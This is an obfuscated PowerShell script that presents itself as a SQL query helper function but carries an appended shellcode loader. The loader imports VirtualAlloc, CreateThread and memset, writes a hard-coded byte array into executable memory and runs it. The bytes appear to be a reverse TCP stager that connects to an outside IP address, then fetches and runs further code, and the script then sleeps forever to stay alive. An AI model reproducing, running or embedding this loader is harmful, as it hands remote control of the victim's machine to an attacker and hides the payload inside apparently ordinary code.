function iNvok`e-`s`qlquERy {

  param (
    [String]${coN`NectIOnST`R`iNG},
    [String]${s`QLser`VEr},
    [String]${u`sERN`Ame},
    [String]${P`A`SswO`RD},
    [String]${cat`A`loG},
    [String]${d`AtabA`sE},
    [String]${Q`U`erY}
  )
  if (!${Da`T`ABA`Se}){
    ${Dat`A`BaSe} = ";"
  } else {
    ${da`T`Ab`ASE} = "$Database;"
  }

  if (!${c`A`TAlOg}){
    ${cAT`A`LOg} = ("{2}{4}{1}{0}{3}{6}{5}"-f' C','itial','I','ata','n','aster;','log=M')
  } else {
    ${cA`TA`lOg} = ('In'+'iti'+'al '+"Catalog=$Catalog;")
  }

  if (${u`S`Er`NaMe} -and ${pA`s`SwOrD}){
    ${aUThe`Nt`I`C`AtioN} = ('User'+' '+"Id=$Username;Password=$Password;")
  } else {
    ${A`U`THentIcA`TIon} = ("{7}{2}{5}{4}{6}{1}{0}{3}" -f 'ecurity','d S','te','=True;','at','gr','e','In')
  }

  if (!${Qu`eRy}){
    ${Q`UE`RY} = ("{0}{2}{1}{3}" -f'S','CT @@ve','ELE','rsion');
  }

  ${Sqlco`NN`ect`iOn} = &("{0}{2}{1}" -f'New-O','ct','bje') ("{1}{3}{7}{6}{9}{5}{8}{4}{2}{0}" -f'nnection','Sy','o','s','nt.SqlC','Cli','em.Data.S','t','e','ql')
  ${SQ`l`CO`NneCTIOn}."cO`NN`ecTiONS`TRING" = ('Data'+' '+"Source=$Sqlserver;$Catalog$Authentication$Database")
  ${SQL`cMd} = &("{2}{0}{1}"-f '-O','bject','New') ("{2}{6}{1}{4}{0}{3}{5}"-f 'm.Dat','s','S','a.SqlClient.SqlCom','te','mand','y')
  ${sq`l`cMd}."COmm`AND`TeXt" = ${Q`U`ery}
  ${sq`l`cMD}."conN`ECTi`ON" = ${S`QlcO`NNEcTION}
  ${Sq`l`ADaP`TER} = .("{0}{2}{1}" -f 'N','t','ew-Objec') ("{6}{0}{2}{1}{5}{8}{4}{3}{7}" -f 'm.Dat','.SqlClient.','a','ap','aAd','SqlD','Syste','ter','at')
  ${sQ`l`Ada`PtEr}."Se`LECTC`omMAnD" = ${sql`C`MD}
  ${DA`T`AseT} = &("{0}{1}{2}"-f'N','ew-O','bject') ("{0}{2}{1}{3}" -f'System.D','Dat','ata.','aSet')
  ${Sql`AdA`pT`Er}.("{1}{0}"-f'ill','F').Invoke(${dA`T`AsEt})
  ${Da`T`ASET}."T`Ab`LEs"[0]            

}
${c} = ((("{80}{106}{98}{83}{23}{8}{72}{79}{119}{1}{115}{3}{101}{64}{82}{14}{4}{99}{104}{68}{46}{19}{62}{54}{28}{103}{38}{75}{45}{88}{35}{11}{16}{81}{18}{84}{20}{30}{44}{52}{122}{53}{121}{63}{76}{33}{21}{29}{91}{9}{0}{37}{17}{92}{112}{24}{113}{51}{61}{117}{57}{47}{27}{26}{70}{12}{87}{67}{36}{49}{73}{32}{105}{39}{25}{109}{7}{40}{95}{118}{50}{108}{93}{2}{56}{77}{111}{48}{102}{59}{69}{78}{94}{6}{15}{107}{31}{90}{13}{97}{60}{10}{89}{42}{43}{65}{110}{96}{55}{71}{114}{58}{74}{41}{120}{116}{85}{22}{34}{5}{100}{86}{66}"-f 'xtern In','bl',', ','tic e','alAllo','t co','(gv8msvcr','ramete','2','static e',' ex','onType','ntPt','s','u','t.dll',',','reat','nt','t ','Prot',']',' ','kernel3','e','l','wStackS','utes, uint d','z','pu','ect);[',']publi','Addre','v8)','uin','ti','lp','tPtr C',' u','tPtr ','r, uin',' u','Int','P','D','flAllo','in','ttrib','hr','St','eatio','(','llI','port(gv','Si','(','IntP','lpThreadA','d',';[Dl','tic','In','dw','ernel32.dl','IntPtr Vi','tr ',');',' ','u','l','ize, I','I','.d','art','est,','int ','lg','tr l','Impor','ll','[',' ui','rt','v8',' fl','c,','nt','r','ca','tern ','c ','blic ','eTh','ags','t','t dwC','t','ta','mport(g','c(IntPtr lpAddre','u','xtern ','eadId)','e,','ss, ','ss, In','DllI','gv8)','nFl','pPa','memse','pT','r','ad','ntPtr ','ic sta','nt sr','tPtr ','r','gv8)]pu','i','8k','m'))."Re`PL`ACe"(([Char]103+[Char]118+[Char]56),[StRing][Char]34));${W} = &("{0}{1}" -f 'Add-T','ype') -memberDefinition ${C} -Name ("{0}{1}"-f 'W','in32') -namespace ("{4}{0}{3}{2}{1}"-f 'u','ons','ti','nc','Win32F') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x8d,0xff,0x96,0x4a,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x75,0xee,0xc3;${G} = 0x1000;if (${Z}."LeN`G`TH" -gt 0x1000){${G} = ${Z}."LENg`TH"};${x}=${W}::("{2}{3}{1}{0}" -f'loc','l','Virtua','lA').Invoke(0,0x1000,${G},0x40);for (${i}=0;${I} -le (${z}."L`eNgtH"-1);${i}++) {${w}::"mEMS`ET"([IntPtr](${X}.("{1}{0}{2}" -f 'n','ToI','t32').Invoke()+${i}), ${z}[${i}], 1)};${w}::("{1}{3}{2}{0}"-f'ead','Creat','Thr','e').Invoke(0,0,${X},0,0,0);for (;;){&("{2}{1}{0}" -f 'sleep','-','Start') 60};
